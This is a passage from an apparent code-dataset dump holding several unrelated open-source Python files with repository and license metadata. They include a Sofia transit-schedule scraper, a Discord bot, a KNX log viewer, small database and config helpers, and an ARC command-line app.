" });\n\n" % pickle.dumps( mysubclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing method', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded.mymethod(), 'test foo!');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print("});\n\n", file = testfile ) | mit | 8,166,288,575,835,632,000 | 43.815217 | 111 | 0.600194 | false | 3.359413 | true | false | false |
PuloV/sofiatraffic-api | st_parser.py | 1 | 9580 | import requests
import re
import time
from html.parser import HTMLParser
import json
import os
import datetime
from multiprocessing.dummy import Pool as ThreadPool
class PageParsing:
"""Parsing class with static methods"""
MAIN_PAGE = "http://schedules.sofiatraffic.bg/"
TRANSPORT_RE = '(tramway|trolleybus|autobus){1}'
@classmethod
def parse_schedule_buttons(cls, content):
# get all schedule btn ids from the content
SCHEDULE_BTN_ID_RE = 'id="schedule_\d*_button"'
schedule_btns = re.findall(SCHEDULE_BTN_ID_RE, content)
# contains the found schedule ids
btns = []
for btn in schedule_btns:
schedule_id = btn.replace('id="schedule_', "")
schedule_id = schedule_id.replace('_button"', "")
btns.append(schedule_id)
return btns
@classmethod
def parse_schedule_name(cls, content, schedule_id):
# get the schedule name like "делник" / "предпразник / празник"
SCHEDULE_BTN_RE = 'id="schedule_{}_button".*?>.*?</a>'.format(schedule_id)
SCHEDULE_BTN_TITLE_RE = '<span>.*?</span>'
schedule_btn = re.findall(SCHEDULE_BTN_RE, content)[-1]
schedule_title = re.findall(SCHEDULE_BTN_TITLE_RE, schedule_btn)[-1]
schedule_title = schedule_title.replace("<span>", "")
schedule_title = schedule_title.replace("</span>", "")
return schedule_title
@classmethod
def check_is_weekly_schedule(cls, schedule):
# no idea why this doesnt work
# return schedule == "делник"
return schedule == b'\xd0\xb4\xd0\xb5\xd0\xbb\xd0\xbd\xd0\xb8\xd0\xba'
@classmethod
def parse_routes_stops(cls, content):
# get all stations from the content
STOPS_LI_RE = '<li class="\s+stop_\d*">.*?</li>'
STOP_NAME_A_RE = '<a .*? class="stop_change".*?>.*?</a>'
STOP_NAME_RE = '>.*?<'
STOP_HREF_A_RE = '<a.*?class="stop_link".*?>.*?</a>'
STOP_HREF_RE = 'id=".*?"'
stops_li = re.findall(STOPS_LI_RE, content)
# contains the found stops
stops = []
for stop_li in stops_li:
# get the first (and only) stop name a tag
stop_name_a = re.findall(STOP_NAME_A_RE, stop_li).pop()
# get the first (and only) stop name from a tag
stop_name = re.findall(STOP_NAME_RE, stop_name_a).pop()
stop_name = stop_name.replace(">", "")
stop_name = stop_name.replace("<", "")
# get the first (and only) stop href a tag
stop_href_a = re.findall(STOP_HREF_A_RE, stop_li).pop()
# get the first (and only) stop href from a tag
stop_href = re.findall(STOP_HREF_RE, stop_href_a).pop()
stop_href = stop_href.replace('id="', "")
stop_href = stop_href.replace('"', "")
ids = re.findall("\d{1,}", stop_href)
stops.append({
"stop_name": stop_name,
"schedule": "",
"direction": "",
"stop_no": ids[2]
})
return stops
@classmethod
def parse_routes_times(cls, content):
# get all time formated strings from the content
TIME_RE = '\d{0,2}:\d{2}'
time_resilts = re.findall(TIME_RE, content)
return time_resilts
@classmethod
def generate_route_stops_url(cls, schedule, direction, stop_no):
# "server/html/schedule_load/4018/1165/1254"
return "server/html/schedule_load/{}/{}/{}".format(schedule, direction, stop_no)
@classmethod
def parse_route_direction(cls, content, route):
# collect data for the directions of the route
DIRECTIONS_RE = '<a href="/{}#direction/\d*" id="schedule_direction_\d*_\d*_button" class=".*?schedule_view_direction_tab">.*?</a>'.format(route)
directions_result = re.findall(DIRECTIONS_RE, content)
directions = set()
# parse the data of the directions
for direction in directions_result:
# get the route url
URL_RE = '/\w*/.*?/\d*'
url_result = re.search(URL_RE, direction)
url = url_result.group(0)
url = url.replace("/", "", 1)
# get the route title
TITLE_RE = 'n>.*?<'
title_result = re.search(TITLE_RE, direction)
title = title_result.group(0)
title = title.replace("n>", "")
title = title.replace("<", "")
directions.add((url, title))
return directions
@classmethod
def get_route_stations(cls, route):
# get all stations by schedule directions for the route
time_last = time.time()
route_url = "{}{}".format(cls.MAIN_PAGE, route)
r = requests.get(route_url)
content = "{}".format(r.content)
# get all times for this route
stops = cls.parse_routes_stops(content)
# get the schedule buttons for the current route
schedules = cls.parse_schedule_buttons(content)
# get the directions for the current route
directions = cls.parse_route_direction(content, route)
direction_stops_times = []
for schedule in schedules:
# get the schedule type name
schedule_name = cls.parse_schedule_name(content, schedule)
for direction in directions:
# get the direction id
direction_id = re.findall("\d{1,}", direction[0]).pop()
for stop in stops:
# set the direction and schedule
stop["schedule"] = schedule_name
stop["direction"] = direction[1]
# get the url for this stop
stop_url = cls.generate_route_stops_url(schedule, direction_id, stop["stop_no"])
stop_url = "{}{}".format(cls.MAIN_PAGE, stop_url)
sr = requests.get(stop_url)
stop_content = "{}".format(sr.content)
# check for wrong request with empty body
if stop_content == "":
continue
# get all times for this route
schedule_times = cls.parse_routes_times(stop_content)
# check for wrong request with empty body
if len(schedule_times) == 0:
continue
direction_stops_times.append({
"url": stop_url,
"times": schedule_times,
"schedule_id": schedule,
"weekly_schedule": cls.check_is_weekly_schedule(schedule_name),
"direction_id": direction_id,
"stop": {
"schedule": schedule_name,
"direction": direction[1],
"stop_name": stop["stop_name"],
"stop_no": stop["stop_no"]
}
})
# print(json.dumps(direction_stops_times))
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
json_file = "{}/{}.json".format(today, route.replace("/", "_"))
temp_file = open(json_file, 'w')
temp_file.write(json.dumps(direction_stops_times))
temp_file.close()
current_time = time.time()
print(json_file, current_time - time_last)
return direction_stops_times
@classmethod
def run_thread(cls, url):
# function that runs in the threads
line = list(url.keys())[0]
return cls.get_route_stations(url.get(line))
@classmethod
def parse_traffic_links(cls, content):
# get all transport page urls from the content
class TransportLinksParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.recording = 0
self.data = []
self.link = ""
def handle_starttag(self, tag, attributes):
if tag != 'a':
return
for name, val in attributes:
if name == 'href' and re.match(cls.TRANSPORT_RE, val):
self.recording += 1
self.link = val
break
else:
self.link = ""
def handle_endtag(self, tag):
if tag == 'a' and self.recording:
self.recording -= 1
def handle_data(self, data):
if self.recording and self.link != "":
self.data.append({data: self.link})
lp = TransportLinksParser()
lp.feed(content)
return lp.data
@classmethod
def parse_main_page(cls):
# get the main page and craw ...
r = requests.get(cls.MAIN_PAGE)
content = "{}".format(r.content)
urls = cls.parse_traffic_links(content)
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
if not os.path.exists(today):
os.mkdir(today)
# craw in 4 threads
pool = ThreadPool(4)
pool.map(cls.run_thread, urls)
if __name__ == '__main__':
time_last = time.time()
print("Started parsing the {} website!".format(PageParsing.MAIN_PAGE))
PageParsing.parse_main_page()
current_time = time.time()
print("Parsed for {} seconds".format(current_time - time_last))
| gpl-2.0 | -1,020,988,815,074,494,200 | 35.872587 | 153 | 0.533717 | false | 4.005872 | false | false | false |
TresysTechnology/setools | setoolsgui/genfsconmodel.py | 2 | 1842 | # Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import stat
from PyQt5.QtCore import Qt
from .models import SEToolsTableModel
class GenfsconTableModel(SEToolsTableModel):
"""Table-based model for genfscons."""
headers = ["FS Type", "Path", "File Type", "Context"]
_filetype_to_text = {
0: "Any",
stat.S_IFBLK: "Block",
stat.S_IFCHR: "Character",
stat.S_IFDIR: "Directory",
stat.S_IFIFO: "Pipe (FIFO)",
stat.S_IFREG: "Regular File",
stat.S_IFLNK: "Symbolic Link",
stat.S_IFSOCK: "Socket"}
def data(self, index, role):
if self.resultlist and index.isValid():
row = index.row()
col = index.column()
rule = self.resultlist[row]
if role == Qt.DisplayRole:
if col == 0:
return rule.fs
elif col == 1:
return rule.path
elif col == 2:
return self._filetype_to_text[rule.filetype]
elif col == 3:
return str(rule.context)
elif role == Qt.UserRole:
return rule
| lgpl-2.1 | -7,367,100,566,871,772,000 | 30.220339 | 66 | 0.606949 | false | 3.927505 | false | false | false |
alexandershuping/cabbage-bot | cabbage.py | 1 | 2905 | import cabbagerc
import discord
from discord.ext import commands
from phrasebook.Phrasebook import Phrasebook
from datetime import datetime
cabbageNumber = 2
cabbageStealer = 0
cabbageTheftTime = 0
description = '''Bot That Performs Cabbage-Related Functions'''
bot = commands.Bot(command_prefix=cabbagerc.PREF, description=description)
modules = [
'mod.roller.roller',
'mod.trump.trump',
'mod.admin.admin',
'mod.poll.poll',
'mod.starboard.starboard',
'mod.scp.scp'
]
def autoset():
''' Setup functions '''
global modules
for mod in modules:
bot.load_extension(mod)
def timeStrSince(d):
diff = datetime.now() - d
ts = int(diff.total_seconds())
con = ''
if ts == 0:
return 'just now'
con += str(ts % 60) + ' seconds'
minute = int(ts/60)
if minute == 0:
return con
con = str(minute % 60) + ' minutes and ' + con
hour = int(minute/60)
if hour == 0:
return con
con = str(hour % 24) + ' hours, ' + con
day = hour / 24
if day == 0:
return con
con = str(day) + ' days, ' + con
return con
@bot.event
async def on_ready():
print('CABBAGE IS ONLINE')
print('USER: ' + bot.user.name + ' [' + bot.user.id + ']')
print('=================')
@bot.command(pass_context=True)
async def intro(ctx):
''' Test Command '''
p = Phrasebook(ctx, bot)
await bot.say(p.pickPhrase('core', 'intro1'))
await bot.say(p.pickPhrase('core', 'intro2'))
@bot.command(pass_context=True)
async def cabbages(ctx):
''' Displays the current number of cabbages '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' requested cabbage count (currently ' + str(cabbageNumber) + ')')
if datetime.now().hour < 5:
await bot.say(p.pickPhrase('cabbage', 'checkLate'))
return
if cabbageNumber == 0:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer, timeStrSince(cabbageTheftTime)))
else:
await bot.say(p.pickPhrase('cabbage', 'check', cabbageNumber))
@bot.command(pass_context=True)
async def takeCabbage(ctx):
''' Take a cabbage for yourself
Be careful, though: once the cabbages are gone, they're gone until I restart. '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' took cabbage (now ' + str(cabbageNumber-1) + ')')
if cabbageNumber > 1:
cabbageNumber = cabbageNumber - 1
if cabbageNumber > 100:
await bot.say(p.pickPhrase('cabbage', 'takePlenty', cabbageNumber))
else:
await bot.say(p.pickPhrase('cabbage', 'take', cabbageNumber))
elif cabbageNumber == 1:
cabbageNumber = 0
await bot.say(p.pickPhrase('cabbage', 'takeLast'))
cabbageStealer = ctx.message.author
cabbageTheftTime = datetime.now()
else:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer.name, timeStrSince(cabbageTheftTime)))
autoset()
bot.run(cabbagerc.TKN)
| mit | 4,933,143,436,424,292,000 | 23.82906 | 109 | 0.689845 | false | 2.714953 | false | false | false |
DigitalSlideArchive/large_image | girder/girder_large_image/loadmodelcache.py | 1 | 3260 | #############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
import cherrypy
import time
from girder.api.rest import getCurrentToken
from girder.utility.model_importer import ModelImporter
LoadModelCache = {}
LoadModelCacheMaxEntries = 100
LoadModelCacheExpiryDuration = 300 # seconds
def invalidateLoadModelCache(*args, **kwargs):
"""
Empty the LoadModelCache.
"""
LoadModelCache.clear()
def loadModel(resource, model, plugin='_core', id=None, allowCookie=False,
level=None):
"""
Load a model based on id using the current cherrypy token parameter for
authentication, caching the results. This must be called in a cherrypy
context.
:param resource: the resource class instance calling the function. Used
for access to the current user and model importer.
:param model: the model name, e.g., 'item'.
:param plugin: the plugin name when loading a plugin model.
:param id: a string id of the model to load.
:param allowCookie: true if the cookie authentication method is allowed.
:param level: access level desired.
:returns: the loaded model.
"""
key = tokenStr = None
if 'token' in cherrypy.request.params: # Token as a parameter
tokenStr = cherrypy.request.params.get('token')
elif 'Girder-Token' in cherrypy.request.headers:
tokenStr = cherrypy.request.headers['Girder-Token']
elif 'girderToken' in cherrypy.request.cookie and allowCookie:
tokenStr = cherrypy.request.cookie['girderToken'].value
key = (model, tokenStr, id)
cacheEntry = LoadModelCache.get(key)
if cacheEntry and cacheEntry['expiry'] > time.time():
entry = cacheEntry['result']
cacheEntry['hits'] += 1
else:
# we have to get the token separately from the user if we are using
# cookies.
if allowCookie:
getCurrentToken(allowCookie)
cherrypy.request.girderAllowCookie = True
entry = ModelImporter.model(model, plugin).load(
id=id, level=level, user=resource.getCurrentUser())
# If the cache becomes too large, just dump it -- this is simpler
# than dropping the oldest values and avoids having to add locking.
if len(LoadModelCache) > LoadModelCacheMaxEntries:
LoadModelCache.clear()
LoadModelCache[key] = {
'id': id,
'model': model,
'tokenId': tokenStr,
'expiry': time.time() + LoadModelCacheExpiryDuration,
'result': entry,
'hits': 0
}
return entry
| apache-2.0 | 1,900,438,198,414,110,700 | 38.277108 | 77 | 0.645092 | false | 4.272608 | false | false | false |
TrondKjeldas/knxmonitor | knxmonitor/Knx/KnxLogViewer.py | 1 | 7940 | from time import time, mktime, strptime
import hashlib
import sys
from knxmonitor.Knx.KnxParseException import KnxParseException
from knxmonitor.Knx.KnxParser import KnxParser
class KnxLogViewer(object):
def _readLinesFromFileOrCache(self, infile):
try:
inf = infile
except IOError:
print "%s: Unable to read file: %s" %(sys.argv[0], infile.name)
sys.exit(1);
except:
op.print_help()
sys.exit(1);
print "Reading file: %s" % infile.name
l = inf.readlines()
inf.close()
# Ok, so now we have the file content. However, parsing it
# is expensive, so look for an already parsed cache of the file.
# The cache files first line is the MD5 sum of the infile, which
# we use to see if the cache is up to date. If it is not, re-parse
# the whole in file and update cache. Future enhancement could be
# to use the part of the cache file that is already there.
hsh = hashlib.md5()
for ll in l:
hsh.update(ll)
infile_md5 = hsh.hexdigest()
cachename = infile.name.replace(".hex",".cache")
try:
inf = open(cachename, "r")
clines = inf.readlines()
cache_md5 = clines.pop(0).strip()
if cache_md5 == infile_md5:
# Ok, seems good...
print "Using cached input for file %s" %infile.name
return (None, infile_md5, clines)
else:
print "Cached file found, but hash mismatch"
print "FILE: %s" %infile_md5
print "CACHE: %s" %cache_md5
except IOError:
# No luck in getting cached input, just use the new...
print "No cached input for file %s found..." %infile.name
return (cachename, infile_md5, l)
def __init__(self, devicesfilename, groupaddrfilename, infiles,
dumpGAtable, types, flanksOnly, tail, groupAddressSet = None,
hourly_avg = False, start_time=None):
self.delta = 0
self.delta2 = 0
self.pduCount = 0
self.pduSkipped = 0
self.h_avg = hourly_avg if hourly_avg != None else False
self.dbgMsg = "groupAddressSet = %s" %str(groupAddressSet)
start = time()
#
# Read in all the files...
#
lines = []
lines_meta = []
start = 1
for infile in infiles:
cachename, hash, newLines = self._readLinesFromFileOrCache(infile)
lines.extend(newLines)
lines_meta.append( (infile.name, cachename, hash,
start, len(newLines) ) )
start += len(newLines)
print "Creating parser..."
self.knx = KnxParser(devicesfilename, groupaddrfilename,
dumpGAtable, flanksOnly, types)
if tail != 0:
if tail < len(lines):
lines = lines[len(lines) - tail :]
if start_time != None:
self.found_start = "Trying to locate start time..."
print "Trying to locate start time..."
for i in range(len(lines)-1, 0, -1):
try:
timestamp, pdu = lines[i].split(":LPDU:")
except ValueError:
timestamp, pdu = lines[i].split("LPDU:")
ts = mktime(strptime(timestamp, "%a %b %d %H:%M:%S %Y"))
if ts < start_time:
print "Found start time!"
self.found_start = "Found start time!"
lines = lines[i+1:]
break
else:
self.found_start = "not relevant"
#
# Parsing the input...
#
basetime = 0
lineNo = 0
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
for line in lines:
# Skip empty lines...
if len(line.strip()) < 1:
continue
# If filter specified, skip unwanted GAs
if groupAddressSet != None:
ignore = True
for ga in groupAddressSet:
if line.find(ga) != -1:
ignore = False
break
if ignore:
self.pduSkipped += 1
continue
lineNo += 1
# Differentiate between parsing new files and loading cached input
if line[:2] == "@@":
pass
#print "loading: %s" %line.strip().decode("utf-8")
else:
# Split timestamp from rest...
try:
timestamp, pdu = line.split(":LPDU:")
except ValueError:
timestamp, pdu = line.split("LPDU:")
try:
if basetime == 0:
basetime = mktime(strptime(timestamp,
"%a %b %d %H:%M:%S %Y"))
self.knx.setTimeBase(basetime)
except ValueError:
printVerbose("timestamp error: %s" %timestamp)
try:
self.knx.parseVbusOutput(lineNo, timestamp, pdu)
self.pduCount += 1
except KnxParseException:
print "Failed: %s: %s" %(lineNo, pdu)
sys.exit(1)
# Check if we are into a new file, in which case we should
# potentially update the cache file for the last file...
# Note that the --tail option disables creation of cache files
if (tail == 0) and lineNo == startLine + numLines - 1:
if cachefilename != None:
print "update cache file for %s (%s) at %s" %(origfilename,
cachefilename,
lineNo)
try:
of = open(cachefilename, "w")
except IOError:
print cachefilename
else:
# write hash at first line
of.write("%s\n" % hash)
self.knx.storeCachedInput(of, startLine)
# Shift meta data to new file...
try:
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
except:
print "Last file done, line no (%s)" %lineNo
origfilename, cachefilename, hash, startLine, numLines = (None, None, None, None, None)
if lineNo % 10000 == 0:
print "Parsed %d lines..." %lineNo
print "Parsed %d lines..." %lineNo
self.dbgMsg += "Parsed %d lines..." %lineNo
self.delta = time() - start
def getPerfData(self):
s = "<p>"
s += "found_start: %s<p>"%self.found_start
if self.delta != 0:
s += "KnxLogViewer: Time used for init: %f (%d PDUs parsed, %d skipped)<p>" %(self.delta, self.pduCount, self.pduSkipped)
s += "Debug: %s<p>GlobalDebug:%s<p>" %(self.dbgMsg, globDbgMsg)
self.delta = 0
s += "KnxLogViewer: Time used for plotgen: %f<p>" %self.delta2
s += "<p>"
return s
def getMinMaxValues(self, groupAddr):
return self.knx.getStreamMinMaxValues(groupAddr)
def plotLog(self, groupAddrs, plotImage, addHorLine=None):
start = time()
self.knx.plotStreams(groupAddrs, plotImage, addHorLine)
self.delta2 = time() - start
def printLog(self, groupAddrs):
self.knx.printStreams(groupAddrs)
def printJSON(self, groupAddrs):
self.knx.printStreams(groupAddrs, "JSON")
| gpl-2.0 | 8,517,884,473,717,793,000 | 34.288889 | 136 | 0.496348 | false | 4.271114 | false | false | false |
glasslion/SPF | spf/core/mydb.py | 6 | 3569 | #!/usr/bin/env python
import sqlite3
import sys
from utils import Utils
class MyDB():
def __init__(self, sqlite_file):
self.sqlite_file = sqlite_file + "spf.sqlite"
#print self.sqlite_file
self.conn = None
if (not self.checkDB()):
self.initDB()
def getCursor(self):
if (self.conn == None):
#print self.sqlite_file
try:
self.conn = sqlite3.connect(self.sqlite_file)
except sqlite3.OperationalError as e:
print e
except:
print sys.exc_info()[0]
return self.conn.cursor()
def checkDB(self):
try:
cursor = self.getCursor()
except:
print sys.exc_info()[0]
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='hosts'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='web_templates'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='ports'")
if cursor.fetchone() is None:
return False
return True
def initDB(self):
cursor = self.getCursor()
cursor.execute("DROP TABLE IF EXISTS users")
cursor.execute("CREATE TABLE users(user TEXT)")
cursor.execute("DROP TABLE IF EXISTS hosts")
cursor.execute("CREATE TABLE hosts(name TEXT, ip TEXT)")
cursor.execute("DROP TABLE IF EXISTS web_templates")
cursor.execute("CREATE TABLE web_templates(ttype TEXT, src_url TEXT, tdir TEXT)")
cursor.execute("DROP TABLE IF EXISTS ports")
cursor.execute("CREATE TABLE ports(port INTEGER, host TEXT)")
self.conn.commit()
return
def addUser(self, user):
cursor = self.getCursor()
cursor.execute('INSERT INTO users VALUES(?)', (user,))
self.conn.commit()
return
def addUsers(self, users):
for user in users:
self.addUser(user)
return
def addHost(self, name, ip=""):
cursor = self.getCursor()
cursor.execute('INSERT INTO hosts VALUES(?,?)', (name, ip,))
self.conn.commit()
return
def addHosts(self, hosts):
for host in hosts:
self.addHost(host)
return
def addPort(self, port, host):
cursor = self.getCursor()
cursor.execute('INSERT INTO ports VALUES(?,?)', (port, host,))
self.conn.commit()
return
def addWebTemplate(self, ttype, src_url, tdir):
cursor = self.getCursor()
cursor.execute('INSERT INTO web_templates VALUES(?,?,?)', (ttype, src_url, tdir,))
self.conn.commit()
return
def getUsers(self):
users = []
cursor = self.getCursor()
cursor.execute('SELECT user FROM users')
for row in cursor.fetchall():
users.append(row[0])
return Utils.unique_list(users)
def getWebTemplates(self, ttype="static"):
templates = []
cursor = self.getCursor()
cursor.execute('SELECT src_url, tdir FROM web_templates WHERE ttype=?', (ttype,))
for row in cursor.fetchall():
templates.append(str(row[1])+"[-]"+str(row[0]))
return Utils.unique_list(templates)
| bsd-3-clause | -3,159,035,181,884,819,500 | 30.584071 | 100 | 0.581676 | false | 4.213695 | false | false | false |
ZombieNinjaPirate/pypkg | System/Output.py | 1 | 1714 | """
Copyright (c) 2014, Are Hansen - Honeypot Development.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND AN EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__author__ = 'Are Hansen'
__date__ = '2014, Aug 3'
__version__ = '0.0.1'
def fwIRC(data_out):
"""Processes and outputs the results of the firewall.log's parsing for IRC dest. """
print '\n ========= IRC Destinations ========='
for irc, detail in data_out.items():
print ' IRC address: {0:>23}'.format(irc)
for info in detail:
print ' - {0}'.format(info)
print '' | gpl-3.0 | 2,196,115,010,699,529,200 | 42.974359 | 100 | 0.755543 | false | 4.211302 | false | false | false |
bayesimpact/bob-emploi | data_analysis/importer/departements.py | 1 | 1293 | """Importer of French Département data in MongoDB."""
import typing
from typing import Any, Dict, List
from bob_emploi.data_analysis.lib import cleaned_data
from bob_emploi.data_analysis.lib import mongo
def make_dicts(
french_departements_tsv: str, french_oversea_departements_tsv: str, prefix_tsv: str) \
-> List[Dict[str, Any]]:
"""Import départements info in MongoDB.
Args:
french_departements_tsv: path to a TSV file containing the main
information about départements from INSEE.
french_oversea_departements_tsv: path to a TSV file containing the
information about oversea collectivities.
prefix_tsv: path to a TSV file containing the prefix for each
département.
Returns:
A list of dict that maps the JSON representation of Departement protos.
"""
departements = cleaned_data.french_departements(
filename=french_departements_tsv,
oversea_filename=french_oversea_departements_tsv,
prefix_filename=prefix_tsv)
departements['_id'] = departements.index
return typing.cast(
List[Dict[str, Any]], departements[['_id', 'name', 'prefix']].to_dict('records'))
if __name__ == '__main__':
mongo.importer_main(make_dicts, 'departements')
| gpl-3.0 | 1,295,578,880,730,163,200 | 34.805556 | 94 | 0.6827 | false | 3.465054 | false | false | false |
erickeller/edi | edi/lib/versionhelpers.py | 1 | 2219 | # -*- coding: utf-8 -*-
# Copyright (C) 2017 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import os
import pkg_resources
import re
import logging
from edi.lib.helpers import FatalError
# The do_release script will update this version!
# During debuild neither the git version nor the package version is available.
edi_fallback_version = '0.4.5'
def get_edi_version():
"""
Get the version of the current edi installation or the version derived from git.
:return: full edi version string
"""
project_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
git_dir = os.path.join(project_root, ".git")
if os.path.isdir(git_dir):
# do import locally so that we do not depend on setuptools_scm for the released version
from setuptools_scm import get_version
return get_version(root=project_root)
else:
try:
return pkg_resources.get_distribution('edi').version
except pkg_resources.DistributionNotFound:
logging.warning('Using fallback version {}.'.format(edi_fallback_version))
return edi_fallback_version
def get_stripped_version(version):
"""
Strips the suffixes from the version string.
:param version: Version string that needs to be parsed
:return: a stripped version string of the format MAJOR[.MINOR[.PATCH]]
"""
result = re.match('\d+(\.\d+){0,2}', version)
if result:
return result.group(0)
else:
raise FatalError('''Unable to parse version '{}'.'''.format(version))
| lgpl-3.0 | -3,946,882,244,747,981,000 | 33.671875 | 95 | 0.695358 | false | 3.927434 | false | false | false |
clebergnu/arc | arc/cli/app.py | 1 | 6728 | """
This is the main entry point for the ARC cli application
"""
import sys
import types
import logging
import importlib
import functools
import arc.config
import arc.connection
import arc.defaults
import arc.cli.args.parser
__all__ = ['App']
class App(object):
"""
Base class for CLI application
"""
def __init__(self, config_klass=None, argument_parser_klass=None):
"""
Initializes a new app instance.
This class is intended both to be used by the stock arcli application
and also to be reused by custom applications. If you want, say, to
limit the amount of command line actions and its arguments, you can
simply supply another argument parser class to this constructor. Of
course another way to customize it is to inherit from this and modify
its members at will.
:param config_klass: an optional configuration class. By default it
will use the arc.config.Config class.
:param argument_parser_klass: an optional argument parser class. By
default it will use arc.cli.args.parser.Parser
"""
#: The application holds a connection instance so that other actions
#: can simply use an already initialized connection for convenience
self.connection = None
self.log = None
self._initialize_log()
self.config = None
self.config_klass = config_klass
self._initialize_config()
self.argument_parser = None
self.argument_parser_klass = argument_parser_klass
self.parsed_arguments = None
self._initialize_argument_parser()
def _initialize_log(self):
"""
Initializes a log instance based on the class name
"""
logging.basicConfig()
self.log = logging.getLogger(self.__class__.__name__)
def _initialize_config(self):
"""
Initializes the configuration system
We keep track of the configuration class used in case it was overriden
"""
if self.config_klass is None:
self.log.debug("Initializing default config class")
self.config = arc.config.get_default()
else:
self.log.debug("Initializing user supplied config class: %s",
self.config_klass)
self.config = self.config_klass()
def _initialize_argument_parser(self):
"""
Initialize the argument parser, either the default or supplied one
"""
if self.argument_parser_klass is None:
self.log.debug("Initializing default argument parser class")
self.argument_parser = arc.cli.args.parser.Parser(self.config)
self.argument_parser.add_arguments_on_all_modules()
else:
self.log.debug("Initializing user supplied argument parser class:"
" %s", self.argument_parser_klass)
self.argument_parser = self.argument_parser_klass(self.config)
def parse_arguments(self):
"""
Parse the arguments from the command line
"""
self.parsed_arguments = self.argument_parser.parse_args()
if hasattr(self.parsed_arguments, "top_level_action"):
self.log.debug("Action (subparser): %s",
self.parsed_arguments.top_level_action)
def initialize_connection(self):
"""
Initialize the connection instance
"""
if self.connection is not None:
self.log.debug("Connection is already initialized")
else:
if hasattr(self.parsed_arguments, "host"):
h = self.parsed_arguments.host
self.log.debug("Connecting to: %s", h)
try:
self.connection = arc.connection.Connection(h)
except arc.connection.InvalidServiceVersionError:
self.log.error("The RPC interface version on the connected "
"server is more recent than this version of "
"arc can support. Please use a more recent "
"version of arc that should include support "
"for the latest Autotest version.")
raise SystemExit
else:
self.log.warn("Host setting not present on arguments, not "
"initializing a connection")
def dispatch_action(self):
"""
Calls the actions that was specified via command line arguments.
This involves loading the relevant module file.
"""
module_name = "%s.%s" % (arc.defaults.ACTIONS_MODULE_PREFIX,
self.parsed_arguments.top_level_action)
self.log.debug("Attempting to load action module: %s", module_name)
try:
module = importlib.import_module(module_name)
self.log.debug("Action module loaded: %s", module)
except ImportError:
self.log.critical("Could not load action module: %s", module_name)
return
# Filter out the attributes out of the loaded module that look
# like command line actions, based on type and 'is_action' attribute
module_actions = {}
for attribute_name in module.__dict__:
attribute = module.__dict__[attribute_name]
if (isinstance(attribute, types.FunctionType) or
isinstance(attribute, functools.partial)):
